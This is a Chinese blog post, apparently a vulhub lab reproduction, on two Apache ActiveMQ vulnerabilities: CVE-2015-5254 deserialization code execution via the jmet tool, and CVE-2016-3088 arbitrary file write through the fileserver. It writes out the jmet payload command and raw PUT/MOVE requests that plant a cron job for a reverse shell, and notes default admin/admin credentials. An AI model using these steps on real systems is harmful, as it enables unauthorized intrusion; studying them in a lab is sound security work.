Activemq

最新推荐文章于 2022-04-21 17:19:14 发布
最新推荐文章于 2022-04-21 17:19:14 发布
阅读量928 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiwangyizhicunzai/article/details/82789411
版权

ActiveMQ

简介:ActiveMQ 是 Apache 软件基金会下的一个开源消息驱动中 间件软件。Jetty 是一个开源的 servlet 容器,它为基于 Java 的 web 容器,例如 JSP 和 servlet 提供运行环境。ActiveMQ 5.0 及以后版本默认集成了jetty。在启动后提供一个监控 ActiveMQ 的 Web 应用。

activemq又称消息队列,即message queue,常用于电商平台的构建中。队列的主要应用于异步处理,应用解耦,流量削锋和消息通讯四个场景中。

ActiveMQ占用两个端口:
61616为工作端口,消息在这个端口进行传输
8161为web console端口

默认账号/密码:admin/admin—>未授权访问

ActiveMQ Deserialization Vulnerability (CVE-2015-5254)

Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。

漏洞利用过程如下:
1.构造(可以使用ysoserial)可执行命令的序列化对象
2.作为一个消息,发送给目标61616端口
3.访问web管理页面,读取消息,触发漏洞

首先下载工具jmet:

git clone https://github.com/matthiaskaiser/jmet.git
wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar

jmet原理是使用ysoserial生成Payload并发送(其jar内自带ysoserial,无需再自己下载),所以我们需要在ysoserial是gadget中选择一个可以使用的,比如ROME。

发送payload:

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME your-ip 61616

进入http://your-ip:8161/admin/browse.jsp?JMSDestination=event点击相应消息

进入容器docker-compose exec activemq bash,可见创建成功

在这里插入图片描述

反弹shell:

在这里插入图片描述
点击消息,结果如下
在这里插入图片描述
tips:
1.其中base64 -d 从标准输入中读取已经进行base64编码的内容,解码输出。
2.管道符将前一个命令的输出作为后一个命令的输入。

reference:
https://www.zhihu.com/question/20004877 (分布式/集群概念)
https://www.zhihu.com/question/36048657 (activemq的应用)
https://blog.csdn.net/qinweili751/article/details/80620104 (activemq的应用)
https://github.com/vulhub/vulhub/blob/master/activemq/CVE-2015-5254/README.zh-cn.md
https://blog.csdn.net/forestcell/article/details/54100073

ActiveMQ Arbitrary File Write Vulnerability (CVE-2016-3088)

activemq下有三个目录admin(解析jsp),api(解析jsp),fileserver(不解析jsp),其中admin和api需要登录,fileserver无需登录,fileserver是一个restful接口,支持PUT/DELETE/MOVE方法对文件进行操作
漏洞发生在fileserver目录下:
在5.12.x之前的版本存在任意文件写入漏洞。
在5.12.x~5.13.x版本中,已经默认关闭了fileserver这个应用。(可在conf/jetty.xml中开启)
在5.14.0版本以后,彻底删除了fileserver应用。

利用方式
1.写入webshell
2.写入cron反弹shell或者写入ssh公钥
3.写入jar或jetty.xml等库和配置文件

1.写入webshell,这里我使用curl发送请求进行写入
http://your-ip:8161/admin/test/systemProperties.jsp查看绝对路径
在这里插入图片描述

这里讲jsp代码用put请求写入fileserver下的文件中(不解析),再用move请求移到api目录下,如下图可解析在这里插入图片描述

2.写入cron反弹shell
做这个的时候还是遇到挺多问题的,一开始用curl写入的时候发现无法进行换行,之后改用使用burp写入,仍发现在shell命令后会多出一个^M,于是在命令后加了一个#来注释掉^M才成功反弹了shell。

tips:在apache解析漏洞复现时突然想到直接在burp中hex下直接添加一个\x0A就行。

PUT /fileserver/1.txt HTTP/1.1
Host: localhost:8161
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 248

SHELL=/bin/bash
*/1 * * * * root payload #

MOVE /fileserver/1.txt HTTP/1.1
Destination: file:///etc/cron.d/root
Host: localhost:8161
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 0

查看cat /var/log/syslog,可以看到cron成功执行
在这里插入图片描述
反弹shell成功
在这里插入图片描述

写ssh公钥 ssh-keygen -t rsa

reference:
https://github.com/vulhub/vulhub/blob/master/activemq/CVE-2016-3088/README.zh-cn.md
https://paper.seebug.org/346/

xiwangyizhicunzai
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ActiveMQ实战资料
12-19
含如下内容:JMS API;Apache-activeMQActiveMQ实战pdf
深入浅出JMS(二)--ActiveMQ简单介绍以及安装
dawuafang
07-31 723
现实的企业中,对于消息通信的应用一直都非常的火热,而且在J2EE的企业应用中扮演着特殊的角色,所以对于它研究是非常有必要的。 上篇博文深入浅出JMS(一)–JMS基本概念,我们介绍了消息通信的规范JMS,我们这篇博文介绍一款开源的JMS具体实现——ActiveMQActiveMQ是一个易于使用的消息中间件。 消息中间件 我们简单的介绍一下消息中间件,对它有一个基本认识就好,消息中间件...
rabbitmq 3.6.6集群升级目前最新版本3.8.5
bhegi_seg的博客
04-21 2812
背景: 系统为centos 7.2 ,目前使用的rabbitmq版本比较旧,故在测试环境下验证升级到目前为止的最新版本3.8.5 各版本依赖的erlang不同,详情可见https://www.rabbitmq.com/which-erlang.html 现erlang的版本过低,故还得升级到最新的erlang才行了。 1.卸载相关程序 各节点执行: yum remove -y rabbitmq-server erlang* 2.安装新版本Erlang 不同系统的方法不一样,详情见https://github
隐藏服务版本,避免被网络扫描(持续更新)
刘元林的博客
12-30 1153
隐藏OpenSSH版本信息 查看当前OpenSSH版本信息 # telnet localhost 22 SSH_2.0-OpenSSH_8.0p1 修改sshd二进制执行文件 # cp -a /usr/sbin/sshd . # hexedit --color sshd 按Tab键切换到ASCII视图; Ctrl+S(或/)搜索:OpenSSH_8.0p1关键字; 搜索到之后,Tab键切回HEX十六进制视图,按0覆盖原有十六进制数字(如下图所示); 直到“OpenSSH_8.0p1”整个串被
Apache ActiveMQ 各个版本所依赖的JDK版本
热门推荐
六月的纸飞机专栏
07-17 2万+
JAVA版本列表 发布版本号 内部版本号(十进制) 内部版本号(十六进制) 1.5 31 49 1.6 32 50 1.7 33 51 1.8 34 52 ActiveMQ 依赖JDK版本 MQ版本号 JDK版本 apache-activemq-5.0.0 1.5+
中间件activeMQ的使用和介绍
孤独症有所好转
01-08 2655
中间件:中间件是一种独立的系统软件或服务程序,分布式应用软件借助这种软件在不同的技术之间共享资源。中间件位于客户机/ 服务器的操作系统之上,管理计算机资源和网络通讯。是连接两个独立应用程序或独立系统的软件。相连接的系统,即使它们具有不同的接口,但通过中间件相互之间仍能交换信息。执行中间件的一个关键途径是信息传递。通过中间件,应用程序可以工作于多平台或 OS 环境。 java中有好多中间件,比如I
ActiveMQ简述
朱小厮的博客
04-15 1万+
概述ActiveMQ是Apache所提供的一个开源的消息系统,完全采用Java来实现,因此,它能很好地支持J2EE提出的JMS(Java Message Service,即Java消息服务)规范。JMS是一组Java应用程序接口,它提供消息的创建、发送、读取等一系列服务。JMS提供了一组公共应用程序接口和响应的语法,类似于Java数据库的统一访问接口JDBC,它是一种与厂商无关的API,使得Java
实战activeMQ
人生最遗憾的莫过于:轻易地放弃了不该放弃的,固执地坚持了不该坚持的
03-03 528
1.JMS介绍      JMS源于企业应用对于消息中间件的需求,使应用程序可以通过消息进行异步处理而互不影响。Sun公司和它的合作伙伴设计的JMS API定义了一组公共的应用程序接口和相应语法,使得Java程序能够和其他消息组件进行通信。JMS有四个组成部分:JMS服务提供者、消息管理对象、消息的生产者消费者和消息本身。  1)JMS服务提供者实现消息队列和通知,同时实现消息管理的API。J
三、 ActiveMQ安装
qq_41799291的博客
01-30 228
1 下载资源 ActiveMQ官网: http://activemq.apache.org 2.压缩 tar -zxf apache-activemq-5.15.8-bin.tar.gz 3.启动 4.在浏览器访问 需要jetty的端口号 1.在activemq中 查看jetty端口 2.可以用 /xxx 来在配置文件中查找东西 3.jetty默认端口是 6181 4.linux ip:61...
记录一次升级ActiveMQ版本遇到的问题
sjz88888的博客
07-13 2104
我负责ActiveMQ服务,本周一队列消费者的系统反馈他们无法正常监听到消息了,从MQ Console上看到该队列A的消息确实堆积了,Number Of Pending Messages 不断增加,本地开启消费者以及他们系统本地开启消费者都能正常监听到消息,但是线上就是不行,他们服务重启后问题依然无法解决,找不到解决的办法,我就考虑升级下AMQ版本,原版本为5.8.0(可从MQ Cons...
activemq
03-10
activemq
apache-activemq-5.16.6-bin.zip
12-26
apache-activemq-5.16.6-bin.zip
ActiveMQ客户端
10-23
此附件是Apache下面的一个ActiveMq客户端,如果需要在本地调试,不链接远程服务器的MQ可以下载研究。
ActiveMQ
04-02
NULL 博文链接:https://tristan-s.iteye.com/blog/1450925
Rain Water Algorithm雨水优化算法附matlab代码.zip
最新发布
04-26
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
基于springboot+vue的房屋租赁出售系统
04-26
提供的源码资源涵盖了安卓应用、小程序、Python应用和Java应用等多个领域,每个领域都包含了丰富的实例和项目。这些源码都是基于各自平台的最新技术和标准编写,确保了在对应环境下能够无缝运行。同时,源码中配备了详细的注释和文档,帮助用户快速理解代码结构和实现逻辑。 适用人群: 这些源码资源特别适合大学生群体。无论你是计算机相关专业的学生,还是对其他领域编程感兴趣的学生,这些资源都能为你提供宝贵的学习和实践机会。通过学习和运行这些源码,你可以掌握各平台开发的基础知识,提升编程能力和项目实战经验。 使用场景及目标: 在学习阶段,你可以利用这些源码资源进行课程实践、课外项目或毕业设计。通过分析和运行源码,你将深入了解各平台开发的技术细节和最佳实践,逐步培养起自己的项目开发和问题解决能力。此外,在求职或创业过程中,具备跨平台开发能力的大学生将更具竞争力。 其他说明: 为了确保源码资源的可运行性和易用性,特别注意了以下几点:首先,每份源码都提供了详细的运行环境和依赖说明,确保用户能够轻松搭建起开发环境;其次,源码中的注释和文档都非常完善,方便用户快速上手和理解代码;最后,我会定期更新这些源码资源,以适应各平台技术的最新发展和市场需求。
杭电-[数据结构(c语言版)]复习题纲杭州电子科技大学.pdf
04-26
杭州电子科技大学,期末考试资料,计算机专业期末考试试卷,试卷及答案,数据结构。
年医院医生个人工作总结.docx
04-26
工作总结,新年计划,岗位总结,工作汇报,个人总结,述职报告,范文下载,新年总结,新建计划。
阿里巴巴笔试题目.docx
04-26
校园招聘笔试题目及答案
pulsar activemq
11-28
Pulsar是一种开源的分布式消息系统,而ActiveMQ是一种流行的开源消息代理系统。Pulsar ActiveMQ是将这两种系统结合在一起的项目。 Pulsar是由Apache软件基金会开发的,旨在解决传统消息队列系统的一些瓶颈和限制。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值